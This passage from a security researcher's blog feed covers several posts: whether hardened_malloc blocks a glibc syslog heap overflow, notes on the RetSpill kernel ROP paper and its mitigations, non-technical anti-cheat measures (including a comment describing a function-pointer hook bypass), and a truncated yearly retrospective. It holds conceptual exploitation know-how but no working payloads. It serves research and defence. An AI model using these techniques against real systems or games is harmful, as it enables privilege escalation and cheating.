<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
<span class="p">...</span>
<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags</span><span class="p">);</span>
</code></pre></div>
<p>The tl;dr is that <code>bufsize</code> is <code>0</code> while <code>l</code> is user-controlled.
As mentioned in the advisory, messing with nss structures as done
in their (phenomenal) <a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt"><code>Baron Samedit</code> sudo
exploit</a>
is a good way to turn this into a root shell on a stock glibc.</p>
<p>While the bug is in glibc's <code>syslog</code>, it's not unheard of for
people to run custom allocators for performance/security/speed/… reasons.
One of those could be, for example, <a href="https://github.com/GrapheneOS/hardened_malloc">hardened_malloc</a>,
<a href="https://grapheneos.org">GrapheneOS</a>'s security-focused allocator, raising
the question "would <code>hardened_malloc</code> make this particular bug
unexploitable on my x86_64 Debian machine?"</p>
<p>After discussing this with friends, we don't <em>think</em> that it makes
the bug completely unexploitable, but ridiculously complicated, which is good
enough™ for me. But keep in mind that this "analysis" was done hastily at 2am,
so caveat lector.</p>
<p><code>hardened_malloc</code> uses size-class based slab isolation, popularised by
<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>.
Since <code>bufsize</code> is zero, this is a 1-byte
allocation, falling into the
<a href="https://github.com/GrapheneOS/hardened_malloc/blob/main/h_malloc.c#L147">16 bytes size-class</a>,
the smallest after the special <code>0</code> one. Only objects of the same size class share a slab,
so to exploit this, one would have to find an interesting object of 16 bytes or less
to overwrite. But since slab canaries are enabled by default, this becomes even
more difficult: the requested size is bumped by the 8-byte canary before picking
a size class, meaning that the neighbours of <code>buf</code> are in fact objects of
8 bytes or less.</p>
<p>Moreover, a 16-byte slab holds at most 256 slots, and slabs are
separated by guard pages, meaning that anything written past the end of the slab
(at most <code>buf+(256*16)</code> away) lands in a guard page and crashes.</p>
<p>Slot selection within a slab is randomized, which might help for bruteforcing the heap layout:
if the current one isn't exploitable, just crash and start again. But it will
also result in a lot more crashes, since <code>buf</code> might be allocated close to
the guard page.</p>
<p>There are of course other mitigations, but they aren't relevant in this
particular case, like canaries being checked on <code>free</code>,
or <a href="https://community.arm.com/arm-community-blogs/b/architectures-and-processors-blog/posts/enhanced-security-through-mte">ARM's MTE</a>, which completely kills linear overflows.</p>
<p>Given the ludicrous amount of randomization <code>hardened_malloc</code> applies to heap bases (32G
per region), bruteforcing the offset to anything not on the heap is futile.
So one would have to find something interesting in an object of 8 bytes or less on
the heap, like a short path to corrupt as with <code>service_user</code>,
or a partial overwrite of a function pointer to reach a
<a href="https://david942j.blogspot.com/2017/02/project-one-gadget-in-glibc.html">one-shot gadget</a>, …</p>
<p>Thanks to <code>strcat</code> for the handholding, and
to <code>jdoe</code>, <code>drvink</code> and <code>J</code> for their diligent proofreading.</p></content><category term="security"></category></entry><entry><title>Paper notes: RetSpill</title><link href="https://dustri.org/b/paper-notes-retspill.html" rel="alternate"></link><published>2024-01-18T16:45:00+01:00</published><updated>2024-01-18T16:45:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-01-18:/b/paper-notes-retspill.html</id><summary type="html"><ul>
<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
<a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
<a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
<a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
<a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
<a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
<a href="http://xinyuxing.org/">Xinyu Xing</a> and
<a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
</ul>
<p>The idea of the paper is to use user-controlled …</p></summary><content type="html"><ul>
<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
<a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
<a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
<a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
<a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
<a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
<a href="http://xinyuxing.org/">Xinyu Xing</a> and
<a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
</ul>
<p>The idea of the paper is to use user-controlled data that are by design copied
into kernel-land when exercising syscalls to store a <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">ROP</a>-chain, through four main avenues:</p>
<ul>
<li>Valid Data directly copied onto the kernel stack for performance reasons, like when
calling <code>poll</code>;</li>
<li>Preserved Registers, restored upon returning from kernel-land to
userland. </li>
<li>Calling Convention: compliant functions save/restore registers, and
apparently system call handlers follow the calling convention
even though the kernel already takes care of saving user registers,
and syscalls can <a href="https://www.kernel.org/doc/html/latest/process/adding-syscalls.html?highlight=syscall_define#do-not-call-system-calls-in-the-kernel">only be called from userland</a>.
But even if the syscall handlers weren't compliant, registers still contain
userland values when they're called, and sub-functions may well save/restore
those registers, since they do need to be compliant.</li>
<li>Uninitialized Memory, since the per-thread kernel stack is reused between syscalls,
and not erased (unless <code>PAX_MEMORY_STACKLEAK</code> is used).</li>
</ul>
<p>Then, only a <a href="https://en.wikipedia.org/wiki/KASLR">KASLR</a> leak,
a CFHP (control-flow hijacking primitive)
and an <code>add rsp, X; ret</code>-like gadget are required to <a href="https://www.youtube.com/watch?v=FoUWHfh733Y">ROP all the things</a>.
Nowadays, most™ CFHP are created by corrupting the heap to hijack function
pointers, and since every kernel thread shares the same heap,
once it is properly shaped, the control-flow hijacking primitive can likely
be triggered again and again from different threads.
Moreover, changing the exploit is simply a matter of re-invoking a syscall with
a different data spill, instead of having to reshape the heap every single time.
One doesn't have to worry about crashes (enabling lame bruteforcing), since no
major Linux distribution (except CentOS, kudos) has <code>panic_on_oops</code> enabled,
so having a ROP-chain crash is no big deal, because the CFHP is still on the
heap, one syscall away.</p>
<p>Since the space afforded to store gadgets might be too small, one trick is to
invoke <code>do_task_dead</code> at the end of every ROP-chain to terminate it gracefully,
and trigger the CFHP again and again.</p>
<p>Mitigation-wise: </p>
<ul>
<li><a href="https://en.wikipedia.org/wiki/Control_register#SMEP">SMEP</a>,
<a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMAP</a> and
<a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation">KPTI</a> are irrelevant.</li>
<li><a href="https://pax.grsecurity.net/docs/randkstack.txt">RANDKSTACK</a> mitigates data spillage from Preserved Registers and Uninitialized Memory,
but since it only provides 5 bits of randomness, a <code>ret</code>-sled is enough
to bypass it (25.44% of the time if using gadgets from Preserved Registers or Uninitialized Memory, 100% otherwise),
and in the absence of <code>panic_on_oops</code> it can quickly be bruteforced anyway.</li>
<li><a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Sanitize_kernel_stack">STACKLEAK</a>,
<a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Forcibly_initialize_local_variables_copied_to_userland">STRUCTLEAK</a>,
and <a href="https://lwn.net/Articles/823152/">CONFIG_INIT_STACK_*</a>
only mitigate data spillage from Uninitialized Memory.</li>
<li><a href="https://lwn.net/Articles/824307/">FG-KASLR</a> is <a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/#gathering-useful-gadgets">useless</a>
since it doesn't randomize everything, leaving a couple (<code>42631</code> according to
the paper) of gadgets at positions it never moves, which are enough to perform
arbitrary reads and derandomize everything.</li>
<li><a href="https://lore.kernel.org/lkml/202210010918.4918F847C4@keescook/T/#u">KCFI</a>
and <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">IBT</a>
also (currently) don't cover everything, but don't really matter much here
anyway, since we only care about backward-edges, and as for the CFHP:</li>
<li>There <a href="https://i.blackhat.com/USA-22/Wednesday/US-22-Jin-Monitoring-Surveillance-Vendors.pdf#page=35">are ways</a>
to obtain one in the presence of perfect forward-edge CFI with a heap corruption.</li>
<li>Using <code>__x86_indirect_thunk_rdi</code> allows one to turn a forward-edge control-flow transfer into a backward-edge one.</li>
<li>A shadow stack and perfect CFI are a pipe dream that would mitigate RetSpill,
but <a href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf">PaX' RAP</a>
is really close to it, likely making it insanely hard: type-based
CFI for forward edges, and for backward edges a register-stored cookie that changes on
every syscall/task/…, paired with unreadable kernel stacks.</li>
</ul>
<p>To showcase how cool all of this is, the paper comes with a semi-automated tool
outputting the address of a stack-shifting gadget and a function that performs the data
spillage, invokes the triggering system call, and yields a root shell via a
classic <code>commit_creds(init_cred)</code> + returning back to user space. It works by:</p>
<ul>
<li>taking full snapshots of a vm to locate the syscall leading to CFHP by using
a binary-search-like heuristic;</li>
<li>mutating userland inputs (registers, <code>copy_from_user</code>/<code>get_user</code>
parameters, …), continuing the execution of the vm,
marking them as user-controllable data if the CFHP still
happens after modifications, and doing taint analysis to find how to modify
them;</li>
<li>generating a ROP-chain, which isn't that easy, given that:
<ul>
<li>it's done over discrete controlled regions;</li>
<li>there are some constraints, like "<code>eax</code> contains the syscall number",
or "<code>edx</code> comes from both <em>Saved Registers</em> and <em>Calling Convention</em>
spillages".</li>
</ul>
</li>
</ul>
<p>Of course, given that some authors are <a href="https://angr.io/">angr</a> developers,
<a href="https://github.com/angr/angrop">angrop</a> was used to knit the ROP-chains, and
the results are pretty impressive:</p>
<blockquote>
<p>The abundance of data spillage allows 20 out of 22 proof-of-concept programs
that manifest CFHP to be semi-automatically turned into full privilege escalation exploits.</p>
</blockquote>
<p>To kill this technique, the authors suggest:</p>
<ol>
<li><em>Preserved Register</em>: <code>RANDKSTACK</code> helps, but storing userspace registers
somewhere else than on the stack would be even better, eg. in <code>task_struct</code>.</li>
<li><em>Uninitialized Memory</em>: enable <code>STACKLEAK</code>/<code>STRUCTLEAK</code>/<code>CONFIG_INIT_STACK_*</code>,
but the performance impact is pretty steep.</li>
<li><em>Calling Convention</em> and <em>Valid Data</em>: an improved version of <code>RANDKSTACK</code>,
adding a random offset at the bottom of each stack frame, between <code>rsp</code> and user data.
This technique also mitigates Preserved Registers and Uninitialized Memory,
with an average performance overhead of 0.61%.</li>
</ol>
<p>Like all good papers it comes <a href="https://github.com/sefcom/RetSpill">with code</a>.</p>
<p>Amusingly:</p>
<ul>
<li>RetSpill completely bypasses OpenBSD's
<a href="https://isopenbsdsecu.re/mitigations/map_stack/">MAP_STACK</a> mitigation,
should it ever be implemented in kernel-land, </li>
<li>The <a href="https://org.anize.rs/">Organizers</a> CTF team
<a href="https://org.anize.rs/0CTF-2021-finals/pwn/kernote">used</a>
the <a href="https://elixir.bootlin.com/linux/latest/ident/pt_regs"><code>pt_regs</code></a> structure
to store their ROP chain for <a href="https://ctftime.org/event/1357">0CTF/TCTF 2021
Finals</a>'s
<a href="https://ctftime.org/task/17461">Kernote</a> pwn challenge.</li>
</ul></content><category term="paper_notes"></category></entry><entry><title>On non-technical video-games cheat mitigations</title><link href="https://dustri.org/b/on-non-technical-video-games-cheat-mitigations.html" rel="alternate"></link><published>2024-01-12T20:15:00+01:00</published><updated>2024-01-12T20:15:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2024-01-12:/b/on-non-technical-video-games-cheat-mitigations.html</id><summary type="html"><p>Cheats are as old as video games, and will be there as long. There
are a couple of high-profile players in the anti-cheat market today:
<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
<a href="https://easy.ac/en-us/">Epic's EAC</a>,
<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
… as well as in-house ones.</p>
<p>To try to keep up in the race …</p></summary><content type="html"><p>Cheats are as old as video games, and will be there as long. There
are a couple of high-profile players in the anti-cheat market today:
<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
<a href="https://easy.ac/en-us/">Epic's EAC</a>,
<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
… as well as in-house ones.</p>
<p>To try to keep up in the race, both sides are resorting to more and more invasive,
privacy-hostile technical measures: streaming virtualised shellcodes,
hardware fingerprinting and locking,
<a href="https://secret.club/2020/01/05/battleye-stack-walking.html">stack-walking</a>,
bootkit-like kernel drivers,
<a href="https://en.wikipedia.org/wiki/Trusted_Platform_Module">TPM</a>/
secure boot/
<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">HVCI</a>/
<a href="https://en.wikipedia.org/wiki/Input%E2%80%93output_memory_management_unit">IOMMU</a>/
<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a>/…
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/22291331362067-Vanguard-Restrictions">shenanigans</a>,
hypervisors <a href="https://secret.club/2020/04/13/how-anti-cheats-detect-system-emulation.html">detection</a>/usage,
<a href="https://secret.club/2020/03/31/battleye-developer-tracking.html">exfiltration of suspicious materials</a>,
external <a href="https://en.wikipedia.org/wiki/Direct_memory_access">DMA</a> hardware,
or other <a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">more exotic things</a>.</p>
<p>Yet anti-cheats are still routinely bypassed, less in a public manner, granted, but private
and closed-community cheats are still flourishing, since it's a losing game by
nature. And since games and anti-cheats are software, they're of course riddled
with <a href="https://vice.com/en/article/d7y5wj/street-fighter-v-rootkit">hilarious</a> bugs leading to
<a href="https://unknowncheats.me/forum/anti-cheat-bypass/614682-eac-dll-loading-method-eac-forcer.html">stupid</a>
<a href="https://unknowncheats.me/forum/anti-cheat-bypass/503052-easy-anti-cheat-kernel-packet-fucker.html">bypasses</a>.</p>
<p>But this isn't what this blogpost is about. Nowadays, cheats are considered as
part of a larger problem: abuses and toxicity. Cheats aren't (only) hunted down
because they're morally questionable, but because they disturb the way the game is meant to be
enjoyed. Toxic and abusive behaviours lead to the very same results:
A game that isn't fun to play because of cheating/abuse/toxicity issues will see its
player count decrease, get poor reviews, … and won't make money. I'm sure
there is a parallel to be made about the current state of our society, but I
digress.</p>
<p>For this article, we'll consider cheating and abuse/toxicity
as a single issue under the term <em>abuse</em>.
Now, because abuse isn't a purely technical issue, but also a social one, it
can't be solved by technical solutions only, so let's have
a look at what non-technical mitigations game developers are
coming up with to curb this issue.</p>
<p>The most obvious mitigation is to make cheating expensive, money wise.
Having to pay 60EUR for a game is a steep investment, especially if one
has to buy it again every time they get banned. This of course doesn't
apply for free-to-play games, but can be emulated by having a cosmetics
ecosystem, either to pay for, or to grind. The other expensive thing when
playing video games is the hardware, and bans can be tied to it.</p>
<h2>Global measures</h2>
<p>The <em>big</em> mitigation at this level is reputation systems. They're based on
people who know best how a fun and fair game should go: players. After a
match, they're encouraged to cast votes on how fair it was, on a match level,
but also directly at the player level: "Bob was really looking out for others",
"Bob was a team player", and so on. For negative behaviour, reports don't have
to wait for the end of the match, players can report
cheating, being offensive in the text/voice chat, <a href="https://en.wikipedia.org/wiki/Griefer">griefing</a>,
queue dodging, <a href="https://www.urbandictionary.com/define.php?term=smurfing">smurfing</a>, …
Of course, slanderous reports are penalised.</p>
<p>Peer pressure is a good lever too, by taking action not only against cheaters,
but also against people benefiting from the cheat, like regular teammates.</p>
<p><a href="https://en.wikipedia.org/wiki/Bug_bounty_program">Bug bounty programs</a> are now commonplace,
so it's only logical that there are now <a href="https://hackerone.com/riot">some</a>
rewarding anti-cheat bypasses/exploits. The rewards are a bit low for now,
but will likely rise as the programs mature. The positive effects are
multiple:</p>
<ol>
<li>It increases the incentives to report issues to get them fixed: a player
finding a glitch/exploit can now get some cash for the discovery</li>
<li>As more abuse vectors are killed, the reward prices will rise, and it might
become more profitable to report bugs than to sell them to cheat providers.
This isn't unheard of, with <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's
kernelCTF</a>
paying two times more than Zerodium.</li>
<li>If the bug bounty program is correctly managed, the probability of getting a
given amount of money for reporting an issue will be higher than using it in
a cheat for an unknown period of time until it gets fixed.</li>
<li>It will likely increase the amount of people looking for issues and willing
to report them.</li>
</ol>
<p>Community managers can also regularly <s>spread <a href="https://en.wikipedia.org/wiki/Fear,_uncertainty,_and_doubt">FUD</a></s>
post updates about ban waves, anti-cheat measures, reports, … to make it
clear that abusive behaviours are something being taken care of,
and a dangerous gamble for players to take part in. I think
I have seen some people spending time proving that some cheaters streaming live
were in fact replaying pre-recorded footage from an earlier version of the game,
because some of the game's details had been updated in the meantime.</p>
<h2>Accounts-level measures</h2>
<p>Some game stores, like <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>,
have an account-level "cheater" mark, meaning that if someone gets banned from a game for cheating,
other games can know about it. But more importantly,
<a href="https://en.wikipedia.org/wiki/Achievement_(video_games)">achievements</a>
and cosmetics are also tied to an account, and as mentioned previously,
those are non-zero time and/or money investments. Getting banned means losing
them. This of course only deters opportunistic cheaters,
as people can simply create other accounts to cheat, but this can be made
harder via purely technical means.</p>
<p>Most <em>competitive</em> online games have ranked and casual game modes, with the
former being only accessible after having spent a certain amount of time in the
latter one. Meaning that one has to do it again every time they get banned,
or <a href="https://en.wikipedia.org/wiki/Boosting_(video_games)">pay someone to do it</a>.
Some studios are even making players go through more hoops to be able to play, like requiring
<a href="https://en.wikipedia.org/wiki/Multi-factor_authentication">MFA</a>,
or playing a couple of matches against <a href="https://en.wikipedia.org/wiki/Video_game_bot">bots</a>
branded as a tutorial, before being able to play with other people. There is of
course a fine balance to strike: annoying abusers without annoying legitimate players.</p>
<h2>Player-level measures</h2>
<p>The goal of non-technical measures isn't to make it impossible to be abusive,
but to make it not worth it. Moreover, issuing instahwpermabans to <a href="https://en.wikipedia.org/wiki/Edgelord">edgelords</a>
seems a tad heavy-handed, so having a large panel of measures against abusers makes sense:
one might want to allow people to rectify their behaviour, to isolate them to
cool down, and so on. It might include textual warnings, temporary bans, kick
from the current game, chat/voice mute, losing access to ranked play,
reducing the amount of earned experience points, …</p>
<p>Players are abusive for various reasons, but I'd argue that most do so because
it's fun. Ruining the fun for them is thus a good way to curb such behaviours.
A simple way to do this is to make them play together, by grouping players
by reputation, or by having servers with technical anti-cheat measures
explicitly disabled. But there are even more creative measures,
like <a href="https://www.callofduty.com/en/blog/2023/11/call-of-duty-ricochet-anti-cheat-modern-warfare-III-progress-report">disabling their parachute</a>,
reducing their damage output to ridiculous levels, taking away their weapons,
<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">making other legitimate players invisible to them</a>,
randomly dropping some of their inputs,
<a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">hallucinations</a>, … and
while this costs a bit more engineering time than simply grouping them
together, it has a couple of high-value returns on investment:</p>
<ul>
<li>it allows game developers to spend more time collecting data on how cheats work on a technical level;</li>
<li>reducing the impact cheaters have on a game makes it possible to
significantly defer banning them without impacting other players too much,
making it harder for cheat makers to pinpoint how and why a cheat was
detected;</li>
<li>it's absolutely hilarious.</li>
</ul>
<h2>Examples</h2>
<h3><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six Siege</a></h3>
<ul>
<li>It uses BattlEye, and in late 2022 / early 2023 banned around
<a href="https://ubisoft.com/en-us/game/rainbow-six/siege/news-updates/2g7hT2NNuOqrj35RfgsFxN/anticheat-status-update-march-2023">5000</a>
accounts per month, which is a lot, but also shows that it doesn't deter
cheaters.</li>
<li>The game costs <a href="https://store.steampowered.com/app/359550/Tom_Clancys_Rainbow_Six_Siege/">$8</a>,
but if you want to have access to all the operators, it's $70. One can also
unlock operators by playing, which takes several hundreds of hours.</li>
<li>To play ranked, one needs to reach <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/4hShcX2HZTG2ttIi3IIN9Y/matchmaking-rating">level 50</a>,
which takes around 50h, give or take.</li>
<li>The game has a rich ecosystem of cosmetics
that can be <a href="https://store.ubisoft.com/us/dlc-type-skins-cosmetics">purchased for steep prices</a>,
or painstakingly earned by playing,
and that would be lost in case of an account ban.</li>
<li>Friendly fire will result in the damage being applied to the shooter
instead, should it be reported as voluntary by the player at the receiving end.</li>
<li>It's developing a pretty involved <a href="https://ubisoft.com/en-gb/game/rainbow-six/siege/news-updates/22JLMFeayzuamhb7YKbAjm/reputation-system-activation-more">reputation system</a>,
where people with a "positive" behaviour get rewarded (more experience
points, cosmetics, …), while those with a "negative" one
might be prevented from playing <em>ranked</em>,
get fewer experience points,
…</li>
</ul>
<h3><a href="https://en.wikipedia.org/wiki/Call_of_Duty:_Modern_Warfare_II_(2022_video_game)">Call of Duty: Modern Warfare II</a></h3>
<ul>
<li>The game costs <a href="https://store.steampowered.com/app/1962660/Call_of_Duty_Modern_Warfare_II/">$70</a>.</li>
<li><a href="https://callofduty.com/blog/2023/02/call-of-duty-modern-warfare-II-ranked-play-features-challenges-rewards">"Players must be at least Level 16 to access Ranked Play"</a>,
but this can be done in a couple of hours.</li>
<li>Cheating results in an account-wide permaban across all Call of Duty titles.</li>
<li>Banned accounts have their records purged from leaderboards.</li>
<li>Players engaging in "negative" behaviours might get
muted on chat/voice, … and interestingly, cheaters
get paired with other cheaters in matchmaking.
<a href="https://support.activision.com/articles/call-of-duty-security-and-enforcement-policy">Players who often play with the same cheaters</a> (boosting)
will also get their reputation tanked.</li>
</ul>
<h3><a href="https://playvalorant.com/">Valorant</a></h3>
<p>Its developer even published a
<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">great series of blog posts</a> on
what it calls "game health".</p>
<ul>
<li>The game is free-to-play, but comes with <em>a lot</em> of <a href="https://valorantstrike.com/valorant-store/">cosmetics</a>.</li>
<li>Cheaters get a permaban, but people benefiting from them might get a 6-month one as well.</li>
<li>Players joining games and <a href="https://playvalorant.com/en-gb/news/dev/valorant-behavior-detection-and-penalty-updates/">idling to reap experience points</a>,
doing nothing but kneecapping their team, will <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-afk/">get penalised</a>.</li>
<li>Players are encouraged to report toxic behaviours, and to not engage,
since engagement might be penalised as well.</li>
<li>Players using
<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360044791253-Inappropriate-In-Game-Names">certain words</a>,
whether in chat or as a username,
will be flagged as toxic.</li>
<li>Penalties come in various sizes, shapes and durations, allowing them to be fine-tuned
according to behaviour: warnings, voice/chat restrictions,
reduction in experience point
gain, reduction in ranked rating, increased queue waiting time, ranked game
ban, global ban.</li>
<li>Valorant <a href="https://playvalorant.com/en-us/news/dev/valorant-systems-health-series-smurf-detection/">published</a>
their approach to mitigate smurfing, acknowledging that while having multiple accounts
to smurf/trade/evade bans/… is not desirable, some people are using
them to play with friends with a better/worse ranked level.
So while they took measures to detect and mitigate multi-accounting,
they also relaxed the maximum rank difference for players to play together,
which significantly reduced alt-account usage
without altering match fairness in a measurable way.</li>
</ul>
<h2>Conclusion</h2>
<p>This is all nice and dandy, but is it working? According to
data from <a href="https://www.ubisoft.com/en-us/game/rainbow-six/siege/player-protection">Rainbow Six Siege</a>,
<a href="https://playvalorant.com/en-us/news/tags/game-health-series/">Valorant</a>,
<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">Call of Duty: Modern Warfare 2</a>,
… those measures are indeed working pretty well,
and are likely providing better results than technical-only
measures. They are also cheaper, since steering people away from toxic
behaviours doesn't reduce the number of players as much as banning them
outright does. It's nice to see that the video game industry realised that cheating and
abuse/toxicity could be addressed in similar non-technical ways, and that both
approaches are complementary. This is a stark contrast to other fields,
where techno-solutionism is seen as the only possible remedy, even more so
in our machine-learning-all-the-things era.</p>
<h2>Sources and resources</h2>
<ul>
<li><a href="https://youtube.com/watch?v=hI7V60r7Jco">Anti-Cheat for Multiplayer Games</a></li>
<li><a href="https://secret.club/">Secret Club</a></li>
<li><a href="https://unknowncheats.me/">UnKnoWnCheaTs</a></li>
</ul>
<!--
Steam's VAC was already doing basic stuff, like hashing the entire code region of the game on launch, storing the hash, and then re-hashing the code region every few minutes to see if someone had changed the code, presumably to install a trampoline and hook into the game's functions (to write aimbots, wallhacks, etc). When a hash change is detected, the player is banned.
Cheaters found a way to bypass this by simply finding the function they desired to hook and setting any random function pointer within it to 0 (stored in rw memory, so doesn't trigger the code region hash mentioned above). This would trigger an exception, which the cheat developer would catch with Windows' SEH/VEH, effectively giving them a hook into the function without having to modify the code region.
Activision's anti-cheat would then go through a bunch of function pointers (the ones in network/rendering functions mostly, since that's where you'd want to hook to write cheats) and check for null pointers. If a pointer was null, they'd ban you.
Funny enough, this was incredibly easy to bypass: just set the pointer to 1, or 2, or 3, or ...!! All of these addresses are most likely still invalid and they'll still trigger an exception, even though they're theoretically valid pointers, giving you a de-facto hook into the game that bypassed both VAC and BO2's anticheat, and was pretty much unpatchable. Perhaps that's why they started being annoying and banning people for running IDA, Cheat Engine, etc., which are certainly probable indicators but definitely not hard evidence for cheats.
--></content><category term="games"></category></entry><entry><title>2023 in retrospect</title><link href="https://dustri.org/b/2023-in-retrospect.html" rel="alternate"></link><published>2023-12-31T23:59:00+01:00</published><updated>2023-12-31T23:59:00+01:00</updated><author><name>jvoisin</name></author><id>tag:dustri.org,2023-12-31:/b/2023-in-retrospect.html</id><content type="html"><p>In 2023, I did, amongst other things:</p>
<ul>
<li>Donated some money:<ul>
<li>$400 to <a href="https://fsfe.org/">FSFE</a></li>
<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source Peer Bonus</a>, courtesy of Google, to<ul>
<li><a href="https://github.com/richfelker/">Rich Felker</a> for their work on <a href="https://musl.libc.org">musl</a>.</li>
<li><a href="https://mxxn.io/">Blaž Hrastnik</a> for their work on <a href="https://helix-editor.com">Helix</a>.</li>
<li><a href="https://github.com/justinmk">Justin Keyes</a> for their work on <a href="https://neovim.io">Neovim</a>.</li>
<li><a href="https://github.com/jeanas">Jean Abou-Samra</a> for their work on <a href="https://pygments.org">Pygments</a>.</li>
</ul>
</li>
</ul>
</li>
<li>Read a couple of books:<ul>
